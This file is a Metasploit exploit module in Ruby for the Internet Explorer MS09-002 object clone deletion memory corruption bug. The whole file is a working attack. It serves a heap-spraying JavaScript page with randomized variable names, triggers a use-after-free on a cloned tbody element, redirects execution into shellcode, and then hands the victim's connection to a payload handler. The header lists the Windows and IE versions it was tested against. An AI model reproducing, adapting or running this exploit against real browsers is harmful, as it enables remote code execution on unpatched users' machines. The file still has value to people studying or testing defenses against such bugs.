##
# ms09_002_object_delete.rb
# Microsoft Internet Explorer Object Clone Deletion Memory Corruption (MS09-002) exploit module 
# for the Metasploit Framework.
# 
# Tested successfully with Microsoft Internet Explorer 7 on Windows XP SP3, Windows Vista SP1, 
# Windows Server 2003 SP2 and Windows Server 2008 (without patch 961260 of course).
# No DEP bypass. DEP must be off or OptOut the iexplorer.exe process.
#
# Trancer @ www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer Object Clone Deletion Memory Corruption',
			'Description'    => %q{
				This module exploits a memory corruption vulnerability in Internet Explorer in the 
				way deleted objects is accessed.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ], 
			'Version'        => '$Revision:  $',
			'References'     => 
				[
					[ 'MSB', 'MS09-002'  ],
					[ 'CVE', '2009-0075' ],
					[ 'BID', '33627'     ],
					[ 'OSVDB', '51839'   ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-011/'  ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 7.0', { 'Ret' => 0x0C0C0C0C } ],
				],
			'DisclosureDate' => 'Feb 10 2009'))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Set the return\nops
		ret  	  = Rex::Text.to_unescape([target.ret].pack('V'))

		# Randomize the javascript variable names
 		j_shellcode  = rand_text_alpha(rand(100) + 1)
		j_nops       = rand_text_alpha(rand(100) + 1)
		j_slackspace = rand_text_alpha(rand(100) + 1)
		j_fillblock  = rand_text_alpha(rand(100) + 1)
		j_memory     = rand_text_alpha(rand(100) + 1)
		j_counter    = rand_text_alpha(rand(30) + 2)
		j_ret        = rand_text_alpha(rand(100) + 1)
		j_array	     = rand_text_alpha(rand(100) + 1)
		j_function   = rand_text_alpha(rand(100) + 1)
		j_object1    = rand_text_alpha(rand(100) + 1)
		j_object2    = rand_text_alpha(rand(100) + 1)

		# Build out the message
		content = %Q|
			<html>
				<script language='javascript'>
					#{j_shellcode}=unescape('#{shellcode}');
					#{j_memory} = new Array(); 
					#{j_slackspace} = 0x100000-(#{j_shellcode}.length*2+0x01020); 
					#{j_nops} = unescape('#{ret}'); 
					while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; } 
					#{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2); 
					delete #{j_nops}; 
					for(#{j_counter}=0; #{j_counter}<0xC0; #{j_counter}++) { 
						#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_shellcode}; 
					} 
					CollectGarbage(); 
					#{j_ret} = unescape("#{ret}AAAAAAAAAAAAAAAAAAAAAAAAA");
					#{j_array} = new Array(); 
					for (#{j_counter}=0;#{j_counter}<1000;#{j_counter}++)#{j_array}.push(document.createElement("img"));
					function #{j_function}() {
					#{j_object1} = document.createElement("tbody");
					#{j_object1}.click;
					#{j_object2} = #{j_object1}.cloneNode();
					#{j_object1}.clearAttributes();
					#{j_object1} = null;
					CollectGarbage();
					for(#{j_counter}=0; #{j_counter}<#{j_array}.length; #{j_counter}++) #{j_array}[#{j_counter}].src=#{j_ret};
					#{j_object2}.click;
					} 
				</script>
				<script>
					window.setTimeout("#{j_function}();",800);
				</script>
			</html>
			|
		
		# content	= Rex::Text.randomize_space(content)
	
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)
	end

end